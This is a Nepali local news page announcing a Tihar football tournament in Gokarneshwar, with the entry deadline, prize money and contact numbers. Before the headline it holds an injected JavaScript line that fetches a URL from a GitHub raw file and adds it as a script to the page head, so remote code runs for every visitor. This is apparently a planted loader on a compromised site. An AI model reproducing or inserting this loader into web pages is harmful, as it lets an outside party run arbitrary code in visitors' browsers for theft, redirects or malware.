;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); गोकर्णेश्वरमा मुलखर्क युवा क्लबको आयोजनामा कार्तिक १८ गते फुटबल प्रतियोगिता हुदै – जुनेली न्युज
बुधबार, असार १२, २०८२
  • होमपेज
  • गोकर्णेश्वरमा मुलखर्क युवा क्लबको आयोजनामा कार्तिक १८ गते फुटबल प्रतियोगिता हुदै
Breaking News

गोकर्णेश्वरमा मुलखर्क युवा क्लबको आयोजनामा कार्तिक १८ गते फुटबल प्रतियोगिता हुदै

जुनेली न्युज काठमाडौँ |

गोकर्णेश्वर नगरपालिका वडा नं १ स्थित मुलखर्क सुन्दरीजलमा तिहारलाइ लक्षित गरि   फुटबल कप २०८० हुने भएको छ |

मूलखर्क युवा क्लबको आयोजनामा हुने उक्त प्रतियोगिता यहि आउँदो कार्तिक १८ गते शनिवार देखि मूलखर्क स्थित बाघमारा खेल मैदानमा भव्यताका साथ उद्घाटन गरि शुरु गरिनेछ।
उक्त प्रतियोगितामा सहभागी हुन यहि आउँदो कार्तिक १६ गते सम्म अन्तिम आवेदन दिने मिति तोकिएको छ।
खेलमा बिजेता हुने टिमहरुलाई प्रथम पुरस्कार रु.१ लाख नगद शिल्ड मेडल र प्रमाण पत्र, दोस्रो पुरस्कार नगद रु ५० हजार शिल्ड मेडल र प्रमाण पत्र प्रदान गरिनेछ।
प्रतियोगिताको  लागि  गोकर्णेश्वर नगरपालिकाले आर्थिक सहायो गरेको छ |

थप सम्पर्कको लागी 982-3046789 , 9841678878

फेसबुक प्रतिक्रियाहरु